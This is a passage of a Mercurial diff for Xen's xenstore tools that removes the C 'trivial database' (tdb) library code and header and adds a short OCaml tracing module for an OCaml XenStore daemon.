/* Woohoo: we found one! */ - if (lock_record(tdb, tlock->off) != 0) - goto fail; - return tlock->off; - } - - /* Try to clean dead ones from old traverses */ - current = tlock->off; - tlock->off = rec->next; - if (!tdb->read_only && - do_delete(tdb, current, rec) != 0) - goto fail; - } - tdb_unlock(tdb, tlock->hash, F_WRLCK); - want_next = 0; - } - /* We finished iteration without finding anything */ - return TDB_ERRCODE(TDB_SUCCESS, 0); - - fail: - tlock->off = 0; - if (tdb_unlock(tdb, tlock->hash, F_WRLCK) != 0) - TDB_LOG((tdb, 0, "tdb_next_lock: On error unlock failed!\n")); - return -1; -} - -/* traverse the entire database - calling fn(tdb, key, data) on each element. - return -1 on error or the record count traversed - if fn is NULL then it is not called - a non-zero return value from fn() indicates that the traversal should stop - */ -int tdb_traverse(TDB_CONTEXT *tdb, tdb_traverse_func fn, void *private) -{ - TDB_DATA key, dbuf; - struct list_struct rec; - struct tdb_traverse_lock tl = { NULL, 0, 0 }; - int ret, count = 0; - - /* This was in the initializaton, above, but the IRIX compiler - * did not like it. crh - */ - tl.next = tdb->travlocks.next; - - /* fcntl locks don't stack: beware traverse inside traverse */ - tdb->travlocks.next = &tl; - - /* tdb_next_lock places locks on the record returned, and its chain */ - while ((ret = tdb_next_lock(tdb, &tl, &rec)) > 0) { - count++; - /* now read the full record */ - key.dptr = tdb_alloc_read(tdb, tl.off + sizeof(rec), - rec.key_len + rec.data_len); - if (!key.dptr) { - ret = -1; - if (tdb_unlock(tdb, tl.hash, F_WRLCK) != 0) - goto out; - if (unlock_record(tdb, tl.off) != 0) - TDB_LOG((tdb, 0, "tdb_traverse: key.dptr == NULL and unlock_record failed!\n")); - goto out; - } - key.dsize = rec.key_len; - dbuf.dptr = key.dptr + rec.key_len; - dbuf.dsize = rec.data_len; - - /* Drop chain lock, call out */ - if (tdb_unlock(tdb, tl.hash, F_WRLCK) != 0) { - ret = -1; - goto out; - } - if (fn && fn(tdb, key, dbuf, private)) { - /* They want us to terminate traversal */ - ret = count; - if (unlock_record(tdb, tl.off) != 0) { - TDB_LOG((tdb, 0, "tdb_traverse: unlock_record failed!\n"));; - ret = -1; - } - tdb->travlocks.next = tl.next; - SAFE_FREE(key.dptr); - return count; - } - SAFE_FREE(key.dptr); - } -out: - tdb->travlocks.next = tl.next; - if (ret < 0) - return -1; - else - return count; -} - -/* find the first entry in the database and return its key */ -TDB_DATA tdb_firstkey(TDB_CONTEXT *tdb) -{ - TDB_DATA key; - struct list_struct rec; - - /* release any old lock */ - if (unlock_record(tdb, tdb->travlocks.off) != 0) - return tdb_null; - tdb->travlocks.off = tdb->travlocks.hash = 0; - - if (tdb_next_lock(tdb, &tdb->travlocks, &rec) <= 0) - return tdb_null; - /* now read the key */ - key.dsize = rec.key_len; - key.dptr =tdb_alloc_read(tdb,tdb->travlocks.off+sizeof(rec),key.dsize); - if (tdb_unlock(tdb, BUCKET(tdb->travlocks.hash), F_WRLCK) != 0) - TDB_LOG((tdb, 0, "tdb_firstkey: error occurred while tdb_unlocking!\n")); - return key; -} - -/* find the next entry in the database, returning its key */ -TDB_DATA tdb_nextkey(TDB_CONTEXT *tdb, TDB_DATA oldkey) -{ - uint32_t oldhash; - TDB_DATA key = tdb_null; - struct list_struct rec; - char *k = NULL; - - /* Is locked key the old key? If so, traverse will be reliable. */ - if (tdb->travlocks.off) { - if (tdb_lock(tdb,tdb->travlocks.hash,F_WRLCK)) - return tdb_null; - if (rec_read(tdb, tdb->travlocks.off, &rec) == -1 - || !(k = tdb_alloc_read(tdb,tdb->travlocks.off+sizeof(rec), - rec.key_len)) - || memcmp(k, oldkey.dptr, oldkey.dsize) != 0) { - /* No, it wasn't: unlock it and start from scratch */ - if (unlock_record(tdb, tdb->travlocks.off) != 0) - return tdb_null; - if (tdb_unlock(tdb, tdb->travlocks.hash, F_WRLCK) != 0) - return tdb_null; - tdb->travlocks.off = 0; - } - - SAFE_FREE(k); - } - - if (!tdb->travlocks.off) { - /* No previous element: do normal find, and lock record */ - tdb->travlocks.off = tdb_find_lock_hash(tdb, oldkey, tdb->hash_fn(&oldkey), F_WRLCK, &rec); - if (!tdb->travlocks.off) - return tdb_null; - tdb->travlocks.hash = BUCKET(rec.full_hash); - if (lock_record(tdb, tdb->travlocks.off) != 0) { - TDB_LOG((tdb, 0, "tdb_nextkey: lock_record failed (%s)!\n", strerror(errno))); - return tdb_null; - } - } - oldhash = tdb->travlocks.hash; - - /* Grab next record: locks chain and returned record, - unlocks old record */ - if (tdb_next_lock(tdb, &tdb->travlocks, &rec) > 0) { - key.dsize = rec.key_len; - key.dptr = tdb_alloc_read(tdb, tdb->travlocks.off+sizeof(rec), - key.dsize); - /* Unlock the chain of this new record */ - if (tdb_unlock(tdb, tdb->travlocks.hash, F_WRLCK) != 0) - TDB_LOG((tdb, 0, "tdb_nextkey: WARNING tdb_unlock failed!\n")); - } - /* Unlock the chain of old record */ - if (tdb_unlock(tdb, BUCKET(oldhash), F_WRLCK) != 0) - TDB_LOG((tdb, 0, "tdb_nextkey: WARNING tdb_unlock failed!\n")); - return key; -} - -/* delete an entry in the database given a key */ -static int tdb_delete_hash(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash) -{ - tdb_off rec_ptr; - struct list_struct rec; - int ret; - - if (!(rec_ptr = tdb_find_lock_hash(tdb, key, hash, F_WRLCK, &rec))) - return -1; - ret = do_delete(tdb, rec_ptr, &rec); - if (tdb_unlock(tdb, BUCKET(rec.full_hash), F_WRLCK) != 0) - TDB_LOG((tdb, 0, "tdb_delete: WARNING tdb_unlock failed!\n")); - return ret; -} - -int tdb_delete(TDB_CONTEXT *tdb, TDB_DATA key) -{ - uint32_t hash = tdb->hash_fn(&key); - return tdb_delete_hash(tdb, key, hash); -} - -/* store an element in the database, replacing any existing element - with the same key - - return 0 on success, -1 on failure -*/ -int tdb_store(TDB_CONTEXT *tdb, TDB_DATA key, TDB_DATA dbuf, int flag) -{ - struct list_struct rec; - uint32_t hash; - tdb_off rec_ptr; - char *p = NULL; - int ret = 0; - - /* find which hash bucket it is in */ - hash = tdb->hash_fn(&key); - if (tdb_lock(tdb, BUCKET(hash), F_WRLCK) == -1) - return -1; - - /* check for it existing, on insert. */ - if (flag == TDB_INSERT) { - if (tdb_exists_hash(tdb, key, hash)) { - tdb->ecode = TDB_ERR_EXISTS; - goto fail; - } - } else { - /* first try in-place update, on modify or replace. */ - if (tdb_update_hash(tdb, key, hash, dbuf) == 0) - goto out; - if (tdb->ecode == TDB_ERR_NOEXIST && - flag == TDB_MODIFY) { - /* if the record doesn't exist and we are in TDB_MODIFY mode then - we should fail the store */ - goto fail; - } - } - /* reset the error code potentially set by the tdb_update() */ - tdb->ecode = TDB_SUCCESS; - - /* delete any existing record - if it doesn't exist we don't - care. Doing this first reduces fragmentation, and avoids - coalescing with `allocated' block before it's updated. */ - if (flag != TDB_INSERT) - tdb_delete_hash(tdb, key, hash); - - /* Copy key+value *before* allocating free space in case malloc - fails and we are left with a dead spot in the tdb. */ - - if (!(p = (char *)talloc_size(tdb, key.dsize + dbuf.dsize))) { - tdb->ecode = TDB_ERR_OOM; - goto fail; - } - - memcpy(p, key.dptr, key.dsize); - if (dbuf.dsize) - memcpy(p+key.dsize, dbuf.dptr, dbuf.dsize); - - /* we have to allocate some space */ - if (!(rec_ptr = tdb_allocate(tdb, key.dsize + dbuf.dsize, &rec))) - goto fail; - - /* Read hash top into next ptr */ - if (ofs_read(tdb, TDB_HASH_TOP(hash), &rec.next) == -1) - goto fail; - - rec.key_len = key.dsize; - rec.data_len = dbuf.dsize; - rec.full_hash = hash; - rec.magic = TDB_MAGIC; - - /* write out and point the top of the hash chain at it */ - if (rec_write(tdb, rec_ptr, &rec) == -1 - || tdb_write(tdb, rec_ptr+sizeof(rec), p, key.dsize+dbuf.dsize)==-1 - || ofs_write(tdb, TDB_HASH_TOP(hash), &rec_ptr) == -1) { - /* Need to tdb_unallocate() here */ - goto fail; - } - out: - SAFE_FREE(p); - tdb_unlock(tdb, BUCKET(hash), F_WRLCK); - return ret; -fail: - ret = -1; - goto out; -} - -/* Attempt to append data to an entry in place - this only works if the new data size - is <= the old data size and the key exists. - on failure return -1. Record must be locked before calling. -*/ -static int tdb_append_inplace(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash, TDB_DATA new_dbuf) -{ - struct list_struct rec; - tdb_off rec_ptr; - - /* find entry */ - if (!(rec_ptr = tdb_find(tdb, key, hash, &rec))) - return -1; - - /* Append of 0 is always ok. */ - if (new_dbuf.dsize == 0) - return 0; - - /* must be long enough for key, old data + new data and tailer */ - if (rec.rec_len < key.dsize + rec.data_len + new_dbuf.dsize + sizeof(tdb_off)) { - /* No room. */ - tdb->ecode = TDB_SUCCESS; /* Not really an error */ - return -1; - } - - if (tdb_write(tdb, rec_ptr + sizeof(rec) + rec.key_len + rec.data_len, - new_dbuf.dptr, new_dbuf.dsize) == -1) - return -1; - - /* update size */ - rec.data_len += new_dbuf.dsize; - return rec_write(tdb, rec_ptr, &rec); -} - -/* Append to an entry. Create if not exist. */ - -int tdb_append(TDB_CONTEXT *tdb, TDB_DATA key, TDB_DATA new_dbuf) -{ - struct list_struct rec; - uint32_t hash; - tdb_off rec_ptr; - char *p = NULL; - int ret = 0; - size_t new_data_size = 0; - - /* find which hash bucket it is in */ - hash = tdb->hash_fn(&key); - if (tdb_lock(tdb, BUCKET(hash), F_WRLCK) == -1) - return -1; - - /* first try in-place. */ - if (tdb_append_inplace(tdb, key, hash, new_dbuf) == 0) - goto out; - - /* reset the error code potentially set by the tdb_append_inplace() */ - tdb->ecode = TDB_SUCCESS; - - /* find entry */ - if (!(rec_ptr = tdb_find(tdb, key, hash, &rec))) { - if (tdb->ecode != TDB_ERR_NOEXIST) - goto fail; - - /* Not found - create. */ - - ret = tdb_store(tdb, key, new_dbuf, TDB_INSERT); - goto out; - } - - new_data_size = rec.data_len + new_dbuf.dsize; - - /* Copy key+old_value+value *before* allocating free space in case malloc - fails and we are left with a dead spot in the tdb. */ - - if (!(p = (char *)talloc_size(tdb, key.dsize + new_data_size))) { - tdb->ecode = TDB_ERR_OOM; - goto fail; - } - - /* Copy the key in place. */ - memcpy(p, key.dptr, key.dsize); - - /* Now read the old data into place. */ - if (rec.data_len && - tdb_read(tdb, rec_ptr + sizeof(rec) + rec.key_len, p + key.dsize, rec.data_len, 0) == -1) - goto fail; - - /* Finally append the new data. */ - if (new_dbuf.dsize) - memcpy(p+key.dsize+rec.data_len, new_dbuf.dptr, new_dbuf.dsize); - - /* delete any existing record - if it doesn't exist we don't - care. Doing this first reduces fragmentation, and avoids - coalescing with `allocated' block before it's updated. */ - - tdb_delete_hash(tdb, key, hash); - - if (!(rec_ptr = tdb_allocate(tdb, key.dsize + new_data_size, &rec))) - goto fail; - - /* Read hash top into next ptr */ - if (ofs_read(tdb, TDB_HASH_TOP(hash), &rec.next) == -1) - goto fail; - - rec.key_len = key.dsize; - rec.data_len = new_data_size; - rec.full_hash = hash; - rec.magic = TDB_MAGIC; - - /* write out and point the top of the hash chain at it */ - if (rec_write(tdb, rec_ptr, &rec) == -1 - || tdb_write(tdb, rec_ptr+sizeof(rec), p, key.dsize+new_data_size)==-1 - || ofs_write(tdb, TDB_HASH_TOP(hash), &rec_ptr) == -1) { - /* Need to tdb_unallocate() here */ - goto fail; - } - - out: - SAFE_FREE(p); - tdb_unlock(tdb, BUCKET(hash), F_WRLCK); - return ret; - -fail: - ret = -1; - goto out; -} - -static int tdb_already_open(dev_t device, - ino_t ino) -{ - TDB_CONTEXT *i; - - for (i = tdbs; i; i = i->next) { - if (i->device == device && i->inode == ino) { - return 1; - } - } - - return 0; -} - -/* open the database, creating it if necessary - - The open_flags and mode are passed straight to the open call on the - database file. A flags value of O_WRONLY is invalid. The hash size - is advisory, use zero for a default value. - - Return is NULL on error, in which case errno is also set. Don't - try to call tdb_error or tdb_errname, just do strerror(errno). - - @param name may be NULL for internal databases. */ -TDB_CONTEXT *tdb_open(const char *name, int hash_size, int tdb_flags, - int open_flags, mode_t mode) -{ - return tdb_open_ex(name, hash_size, tdb_flags, open_flags, mode, NULL, NULL); -} - -/* a default logging function */ -static void null_log_fn(TDB_CONTEXT *tdb __attribute__((unused)), - int level __attribute__((unused)), - const char *fmt __attribute__((unused)), ...) -{ -} - - -TDB_CONTEXT *tdb_open_ex(const char *name, int hash_size, int tdb_flags, - int open_flags, mode_t mode, - tdb_log_func log_fn, - tdb_hash_func hash_fn) -{ - TDB_CONTEXT *tdb; - struct stat st; - int rev = 0, locked = 0; - uint8_t *vp; - uint32_t vertest; - - if (!(tdb = talloc_zero(name, TDB_CONTEXT))) { - /* Can't log this */ - errno = ENOMEM; - goto fail; - } - tdb->fd = -1; - tdb->name = NULL; - tdb->map_ptr = NULL; - tdb->flags = tdb_flags; - tdb->open_flags = open_flags; - tdb->log_fn = log_fn?log_fn:null_log_fn; - tdb->hash_fn = hash_fn ? hash_fn : default_tdb_hash; - - if ((open_flags & O_ACCMODE) == O_WRONLY) { - TDB_LOG((tdb, 0, "tdb_open_ex: can't open tdb %s write-only\n", - name)); - errno = EINVAL; - goto fail; - } - - if (hash_size == 0) - hash_size = DEFAULT_HASH_SIZE; - if ((open_flags & O_ACCMODE) == O_RDONLY) { - tdb->read_only = 1; - /* read only databases don't do locking or clear if first */ - tdb->flags |= TDB_NOLOCK; - tdb->flags &= ~TDB_CLEAR_IF_FIRST; - } - - /* internal databases don't mmap or lock, and start off cleared */ - if (tdb->flags & TDB_INTERNAL) { - tdb->flags |= (TDB_NOLOCK | TDB_NOMMAP); - tdb->flags &= ~TDB_CLEAR_IF_FIRST; - if (tdb_new_database(tdb, hash_size) != 0) { - TDB_LOG((tdb, 0, "tdb_open_ex: tdb_new_database failed!")); - goto fail; - } - goto internal; - } - - if ((tdb->fd = open(name, open_flags, mode)) == -1) { - TDB_LOG((tdb, 5, "tdb_open_ex: could not open file %s: %s\n", - name, strerror(errno))); - goto fail; /* errno set by open(2) */ - } - - /* ensure there is only one process initialising at once */ - if (tdb_brlock(tdb, GLOBAL_LOCK, F_WRLCK, F_SETLKW, 0) == -1) { - TDB_LOG((tdb, 0, "tdb_open_ex: failed to get global lock on %s: %s\n", - name, strerror(errno))); - goto fail; /* errno set by tdb_brlock */ - } - - /* we need to zero database if we are the only one with it open */ - if ((tdb_flags & TDB_CLEAR_IF_FIRST) && - (locked = (tdb_brlock(tdb, ACTIVE_LOCK, F_WRLCK, F_SETLK, 0) == 0))) { - open_flags |= O_CREAT; - if (ftruncate(tdb->fd, 0) == -1) { - TDB_LOG((tdb, 0, "tdb_open_ex: " - "failed to truncate %s: %s\n", - name, strerror(errno))); - goto fail; /* errno set by ftruncate */ - } - } - - if (read(tdb->fd, &tdb->header, sizeof(tdb->header)) != sizeof(tdb->header) - || strcmp(tdb->header.magic_food, TDB_MAGIC_FOOD) != 0 - || (tdb->header.version != TDB_VERSION - && !(rev = (tdb->header.version==TDB_BYTEREV(TDB_VERSION))))) { - /* its not a valid database - possibly initialise it */ - if (!(open_flags & O_CREAT) || tdb_new_database(tdb, hash_size) == -1) { - errno = EIO; /* ie bad format or something */ - goto fail; - } - rev = (tdb->flags & TDB_CONVERT); - } - vp = (uint8_t *)&tdb->header.version; - vertest = (((uint32_t)vp[0]) << 24) | (((uint32_t)vp[1]) << 16) | - (((uint32_t)vp[2]) << 8) | (uint32_t)vp[3]; - tdb->flags |= (vertest==TDB_VERSION) ? TDB_BIGENDIAN : 0; - if (!rev) - tdb->flags &= ~TDB_CONVERT; - else { - tdb->flags |= TDB_CONVERT; - convert(&tdb->header, sizeof(tdb->header)); - } - if (fstat(tdb->fd, &st) == -1) - goto fail; - - /* Is it already in the open list? If so, fail. */ - if (tdb_already_open(st.st_dev, st.st_ino)) { - TDB_LOG((tdb, 2, "tdb_open_ex: " - "%s (%d,%d) is already open in this process\n", - name, (int)st.st_dev, (int)st.st_ino)); - errno = EBUSY; - goto fail; - } - - if (!(tdb->name = (char *)talloc_strdup(tdb, name))) { - errno = ENOMEM; - goto fail; - } - - tdb->map_size = st.st_size; - tdb->device = st.st_dev; - tdb->inode = st.st_ino; - tdb->locked = talloc_zero_array(tdb, struct tdb_lock_type, - tdb->header.hash_size+1); - if (!tdb->locked) { - TDB_LOG((tdb, 2, "tdb_open_ex: " - "failed to allocate lock structure for %s\n", - name)); - errno = ENOMEM; - goto fail; - } - tdb_mmap(tdb); - if (locked) { - if (tdb_brlock(tdb, ACTIVE_LOCK, F_UNLCK, F_SETLK, 0) == -1) { - TDB_LOG((tdb, 0, "tdb_open_ex: " - "failed to take ACTIVE_LOCK on %s: %s\n", - name, strerror(errno))); - goto fail; - } - - } - - /* We always need to do this if the CLEAR_IF_FIRST flag is set, even if - we didn't get the initial exclusive lock as we need to let all other - users know we're using it. */ - - if (tdb_flags & TDB_CLEAR_IF_FIRST) { - /* leave this lock in place to indicate it's in use */ - if (tdb_brlock(tdb, ACTIVE_LOCK, F_RDLCK, F_SETLKW, 0) == -1) - goto fail; - } - - - internal: - /* Internal (memory-only) databases skip all the code above to - * do with disk files, and resume here by releasing their - * global lock and hooking into the active list. */ - if (tdb_brlock(tdb, GLOBAL_LOCK, F_UNLCK, F_SETLKW, 0) == -1) - goto fail; - tdb->next = tdbs; - tdbs = tdb; - return tdb; - - fail: - { int save_errno = errno; - - if (!tdb) - return NULL; - - if (tdb->map_ptr) { - if (tdb->flags & TDB_INTERNAL) - SAFE_FREE(tdb->map_ptr); - else - tdb_munmap(tdb); - } - SAFE_FREE(tdb->name); - if (tdb->fd != -1) - if (close(tdb->fd) != 0) - TDB_LOG((tdb, 5, "tdb_open_ex: failed to close tdb->fd on error!\n")); - SAFE_FREE(tdb->locked); - SAFE_FREE(tdb); - errno = save_errno; - return NULL; - } -} - -/** - * Close a database. - * - * @returns -1 for error; 0 for success. - **/ -int tdb_close(TDB_CONTEXT *tdb) -{ - TDB_CONTEXT **i; - int ret = 0; - - if (tdb->map_ptr) { - if (tdb->flags & TDB_INTERNAL) - SAFE_FREE(tdb->map_ptr); - else - tdb_munmap(tdb); - } - SAFE_FREE(tdb->name); - if (tdb->fd != -1) - ret = close(tdb->fd); - SAFE_FREE(tdb->locked); - - /* Remove from contexts list */ - for (i = &tdbs; *i; i = &(*i)->next) { - if (*i == tdb) { - *i = tdb->next; - break; - } - } - - memset(tdb, 0, sizeof(*tdb)); - SAFE_FREE(tdb); - - return ret; -} - -/* lock/unlock entire database */ -int tdb_lockall(TDB_CONTEXT *tdb) -{ - uint32_t i; - - /* There are no locks on read-only dbs */ - if (tdb->read_only) - return TDB_ERRCODE(TDB_ERR_LOCK, -1); - for (i = 0; i < tdb->header.hash_size; i++) - if (tdb_lock(tdb, i, F_WRLCK)) - break; - - /* If error, release locks we have... */ - if (i < tdb->header.hash_size) { - uint32_t j; - - for ( j = 0; j < i; j++) - tdb_unlock(tdb, j, F_WRLCK); - return TDB_ERRCODE(TDB_ERR_NOLOCK, -1); - } - - return 0; -} -void tdb_unlockall(TDB_CONTEXT *tdb) -{ - uint32_t i; - for (i=0; i < tdb->header.hash_size; i++) - tdb_unlock(tdb, i, F_WRLCK); -} - -/* lock/unlock one hash chain. This is meant to be used to reduce - contention - it cannot guarantee how many records will be locked */ -int tdb_chainlock(TDB_CONTEXT *tdb, TDB_DATA key) -{ - return tdb_lock(tdb, BUCKET(tdb->hash_fn(&key)), F_WRLCK); -} - -int tdb_chainunlock(TDB_CONTEXT *tdb, TDB_DATA key) -{ - return tdb_unlock(tdb, BUCKET(tdb->hash_fn(&key)), F_WRLCK); -} - -int tdb_chainlock_read(TDB_CONTEXT *tdb, TDB_DATA key) -{ - return tdb_lock(tdb, BUCKET(tdb->hash_fn(&key)), F_RDLCK); -} - -int tdb_chainunlock_read(TDB_CONTEXT *tdb, TDB_DATA key) -{ - return tdb_unlock(tdb, BUCKET(tdb->hash_fn(&key)), F_RDLCK); -} - - -/* register a loging function */ -void tdb_logging_function(TDB_CONTEXT *tdb, void (*fn)(TDB_CONTEXT *, int , const char *, ...)) -{ - tdb->log_fn = fn?fn:null_log_fn; -} - - -/* reopen a tdb - this can be used after a fork to ensure that we have an independent - seek pointer from our parent and to re-establish locks */ -int tdb_reopen(TDB_CONTEXT *tdb) -{ - struct stat st; - - if (tdb->flags & TDB_INTERNAL) - return 0; /* Nothing to do. */ - if (tdb_munmap(tdb) != 0) { - TDB_LOG((tdb, 0, "tdb_reopen: munmap failed (%s)\n", strerror(errno))); - goto fail; - } - if (close(tdb->fd) != 0) - TDB_LOG((tdb, 0, "tdb_reopen: WARNING closing tdb->fd failed!\n")); - tdb->fd = open(tdb->name, tdb->open_flags & ~(O_CREAT|O_TRUNC), 0); - if (tdb->fd == -1) { - TDB_LOG((tdb, 0, "tdb_reopen: open failed (%s)\n", strerror(errno))); - goto fail; - } - if (fstat(tdb->fd, &st) != 0) { - TDB_LOG((tdb, 0, "tdb_reopen: fstat failed (%s)\n", strerror(errno))); - goto fail; - } - if (st.st_ino != tdb->inode || st.st_dev != tdb->device) { - TDB_LOG((tdb, 0, "tdb_reopen: file dev/inode has changed!\n")); - goto fail; - } - tdb_mmap(tdb); - if ((tdb->flags & TDB_CLEAR_IF_FIRST) && (tdb_brlock(tdb, ACTIVE_LOCK, F_RDLCK, F_SETLKW, 0) == -1)) { - TDB_LOG((tdb, 0, "tdb_reopen: failed to obtain active lock\n")); - goto fail; - } - - return 0; - -fail: - tdb_close(tdb); - return -1; -} - -/* Not general: only works if single writer. */ -TDB_CONTEXT *tdb_copy(TDB_CONTEXT *tdb, const char *outfile) -{ - int fd, saved_errno; - TDB_CONTEXT *copy; - - fd = open(outfile, O_TRUNC|O_CREAT|O_WRONLY, 0640); - if (fd < 0) - return NULL; - if (tdb->map_ptr) { - if (write(fd,tdb->map_ptr,tdb->map_size) != (int)tdb->map_size) - goto fail; - } else { - char buf[65536]; - int r; - - lseek(tdb->fd, 0, SEEK_SET); - while ((r = read(tdb->fd, buf, sizeof(buf))) > 0) { - if (write(fd, buf, r) != r) - goto fail; - } - if (r < 0) - goto fail; - } - copy = tdb_open(outfile, 0, 0, O_RDWR, 0); - if (!copy) - goto fail; - close(fd); - return copy; - -fail: - saved_errno = errno; - close(fd); - unlink(outfile); - errno = saved_errno; - return NULL; -} - -/* reopen all tdb's */ -int tdb_reopen_all(void) -{ - TDB_CONTEXT *tdb; - - for (tdb=tdbs; tdb; tdb = tdb->next) { - /* Ensure no clear-if-first. */ - tdb->flags &= ~TDB_CLEAR_IF_FIRST; - if (tdb_reopen(tdb) != 0) - return -1; - } - - return 0; -} diff -r 10a8fae412c5 tools/xenstore/tdb.h --- a/tools/xenstore/tdb.h Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,157 +0,0 @@ -#ifndef __TDB_H__ -#define __TDB_H__ - -/* - Unix SMB/CIFS implementation. - - trivial database library - - Copyright (C) Andrew Tridgell 1999-2004 - - ** NOTE! The following LGPL license applies to the tdb - ** library. This does NOT imply that all of Samba is released - ** under the LGPL - - This library is free software; you can redistribute it and/or - modify it under the terms of the GNU Lesser General Public - License as published by the Free Software Foundation; either - version 2 of the License, or (at your option) any later version. - - This library is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - Lesser General Public License for more details. - - You should have received a copy of the GNU Lesser General Public - License along with this library; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - -#ifdef __cplusplus -extern "C" { -#endif - - -/* flags to tdb_store() */ -#define TDB_REPLACE 1 -#define TDB_INSERT 2 -#define TDB_MODIFY 3 - -/* flags for tdb_open() */ -#define TDB_DEFAULT 0 /* just a readability place holder */ -#define TDB_CLEAR_IF_FIRST 1 -#define TDB_INTERNAL 2 /* don't store on disk */ -#define TDB_NOLOCK 4 /* don't do any locking */ -#define TDB_NOMMAP 8 /* don't use mmap */ -#define TDB_CONVERT 16 /* convert endian (internal use) */ -#define TDB_BIGENDIAN 32 /* header is big-endian (internal use) */ - -#define TDB_ERRCODE(code, ret) ((tdb->ecode = (code)), ret) - -/* error codes */ -enum TDB_ERROR {TDB_SUCCESS=0, TDB_ERR_CORRUPT, TDB_ERR_IO, TDB_ERR_LOCK, - TDB_ERR_OOM, TDB_ERR_EXISTS, TDB_ERR_NOLOCK, TDB_ERR_LOCK_TIMEOUT, - TDB_ERR_NOEXIST}; - -#ifndef uint32_t -#define uint32_t unsigned -#endif - -typedef struct TDB_DATA { - char *dptr; - size_t dsize; -} TDB_DATA; - -typedef uint32_t tdb_len; -typedef uint32_t tdb_off; - -/* this is stored at the front of every database */ -struct tdb_header { - char magic_food[32]; /* for /etc/magic */ - uint32_t version; /* version of the code */ - uint32_t hash_size; /* number of hash entries */ - tdb_off rwlocks; - tdb_off reserved[31]; -}; - -struct tdb_lock_type { - uint32_t count; - uint32_t ltype; -}; - -struct tdb_traverse_lock { - struct tdb_traverse_lock *next; - uint32_t off; - uint32_t hash; -}; - -#ifndef PRINTF_ATTRIBUTE -#define PRINTF_ATTRIBUTE(a,b) -#endif - -/* this is the context structure that is returned from a db open */ -typedef struct tdb_context { - char *name; /* the name of the database */ - void *map_ptr; /* where it is currently mapped */ - int fd; /* open file descriptor for the database */ - tdb_len map_size; /* how much space has been mapped */ - int read_only; /* opened read-only */ - struct tdb_lock_type *locked; /* array of chain locks */ - enum TDB_ERROR ecode; /* error code for last tdb error */ - struct tdb_header header; /* a cached copy of the header */ - uint32_t flags; /* the flags passed to tdb_open */ - struct tdb_traverse_lock travlocks; /* current traversal locks */ - struct tdb_context *next; /* all tdbs to avoid multiple opens */ - dev_t device; /* uniquely identifies this tdb */ - ino_t inode; /* uniquely identifies this tdb */ - void (*log_fn)(struct tdb_context *tdb, int level, const char *, ...) PRINTF_ATTRIBUTE(3,4); /* logging function */ - uint32_t (*hash_fn)(TDB_DATA *key); - int open_flags; /* flags used in the open - needed by reopen */ -} TDB_CONTEXT; - -typedef int (*tdb_traverse_func)(TDB_CONTEXT *, TDB_DATA, TDB_DATA, void *); -typedef void (*tdb_log_func)(TDB_CONTEXT *, int , const char *, ...); -typedef uint32_t (*tdb_hash_func)(TDB_DATA *key); - -TDB_CONTEXT *tdb_open(const char *name, int hash_size, int tdb_flags, - int open_flags, mode_t mode); -TDB_CONTEXT *tdb_open_ex(const char *name, int hash_size, int tdb_flags, - int open_flags, mode_t mode, - tdb_log_func log_fn, - tdb_hash_func hash_fn); - -int tdb_reopen(TDB_CONTEXT *tdb); -int tdb_reopen_all(void); -void tdb_logging_function(TDB_CONTEXT *tdb, tdb_log_func); -enum TDB_ERROR tdb_error(TDB_CONTEXT *tdb); -const char *tdb_errorstr(TDB_CONTEXT *tdb); -TDB_DATA tdb_fetch(TDB_CONTEXT *tdb, TDB_DATA key); -int tdb_delete(TDB_CONTEXT *tdb, TDB_DATA key); -int tdb_store(TDB_CONTEXT *tdb, TDB_DATA key, TDB_DATA dbuf, int flag); -int tdb_append(TDB_CONTEXT *tdb, TDB_DATA key, TDB_DATA new_dbuf); -int tdb_close(TDB_CONTEXT *tdb); -TDB_DATA tdb_firstkey(TDB_CONTEXT *tdb); -TDB_DATA tdb_nextkey(TDB_CONTEXT *tdb, TDB_DATA key); -int tdb_traverse(TDB_CONTEXT *tdb, tdb_traverse_func fn, void *); -int tdb_exists(TDB_CONTEXT *tdb, TDB_DATA key); -int tdb_lockall(TDB_CONTEXT *tdb); -void tdb_unlockall(TDB_CONTEXT *tdb); - -/* Low level locking functions: use with care */ -int tdb_chainlock(TDB_CONTEXT *tdb, TDB_DATA key); -int tdb_chainunlock(TDB_CONTEXT *tdb, TDB_DATA key); -int tdb_chainlock_read(TDB_CONTEXT *tdb, TDB_DATA key); -int tdb_chainunlock_read(TDB_CONTEXT *tdb, TDB_DATA key); -TDB_CONTEXT *tdb_copy(TDB_CONTEXT *tdb, const char *outfile); - -/* Debug functions. Not used in production. */ -void tdb_dump_all(TDB_CONTEXT *tdb); -int tdb_printfreelist(TDB_CONTEXT *tdb); - -extern TDB_DATA tdb_null; - -#ifdef __cplusplus -} -#endif - -#endif /* tdb.h */ diff -r 10a8fae412c5 tools/xenstore/trace.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/trace.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,41 @@ +(* + Tracing for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +(* Trace file descriptor *) +let traceout = ref None + +(* Output a trace string *) +let out str = + match !traceout with + | Some channel -> Printf.fprintf channel "%s" str; flush channel + | None -> () + +(* Trace a creation *) +let create data t = + out (Printf.sprintf "CREATE %s %d\n" t data) + +(* Trace a destruction *) +let destroy data t = + out (Printf.sprintf "DESTROY %s %d\n" t data) + +(* Trace I/O *) +let io domain_id prefix time message = + let message_type = Message.message_type_to_string message.Message.header.Message.message_type + and sanitised_data = Utils.sanitise_string message.Message.payload in + out (Printf.sprintf "%s %d %s %s (%s)\n" prefix domain_id time message_type sanitised_data) diff -r 10a8fae412c5 tools/xenstore/transaction.ml 